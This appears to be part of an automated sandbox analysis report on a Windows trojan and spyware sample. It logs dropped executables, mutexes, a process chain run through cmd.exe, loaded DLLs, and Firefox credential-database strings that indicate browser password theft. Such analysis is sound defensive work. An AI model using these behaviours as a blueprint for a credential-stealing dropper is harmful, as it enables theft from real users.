                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@16/29@0/3
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C927030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,0_2_6C927030
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dllJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4052:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3748:120:WilError_03
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile created: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2310723689.000000001CCB3000.00000004.00000020.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323371001.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323785085.000000006CAFF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2310723689.000000001CCB3000.00000004.00000020.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323371001.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323785085.000000006CAFF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2310723689.000000001CCB3000.00000004.00000020.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323371001.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323785085.000000006CAFF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2310723689.000000001CCB3000.00000004.00000020.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323371001.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323785085.000000006CAFF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2310723689.000000001CCB3000.00000004.00000020.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323371001.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323785085.000000006CAFF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2310723689.000000001CCB3000.00000004.00000020.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323371001.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2310723689.000000001CCB3000.00000004.00000020.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323371001.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323785085.000000006CAFF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                        Source: wqmnYoVbHr.exe, 00000000.00000003.2187810182.0000000022C28000.00000004.00000020.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000003.2172578801.0000000022C34000.00000004.00000020.00020000.00000000.sdmp, CFIIIJJKJKFHIDGDBAKJ.0.dr, FBKJKEHIJECGCBFIJEGI.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2310723689.000000001CCB3000.00000004.00000020.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323371001.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2310723689.000000001CCB3000.00000004.00000020.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323371001.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                        Source: softokn3[1].dll.0.dr, softokn3.dll.0.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                        Source: wqmnYoVbHr.exeReversingLabs: Detection: 52%
                        Source: wqmnYoVbHr.exeVirustotal: Detection: 43%
                        Source: AFHDAKJKFC.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: explortu.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeFile read: C:\Users\user\Desktop\wqmnYoVbHr.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\wqmnYoVbHr.exe "C:\Users\user\Desktop\wqmnYoVbHr.exe"
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EHCBAAAFHJ.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe "C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe"
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeProcess created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe "C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeProcess created: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe "C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe"
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EHCBAAAFHJ.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe "C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeProcess created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe "C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeProcess created: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe "C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: shfolder.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: mozglue.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: wsock32.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: msvcp140.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: pcacli.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dui70.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: duser.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.ui.immersive.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47mrm.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uianimation.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dxgi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: resourcepolicyclient.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: d3d11.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: d3d10warp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dxcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dcomp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: mstask.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: dui70.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: duser.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: chartv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: oleacc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: atlthunk.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: wtsapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: explorerframe.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeSection loaded: shfolder.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeSection loaded: wininet.dllJump to behavior
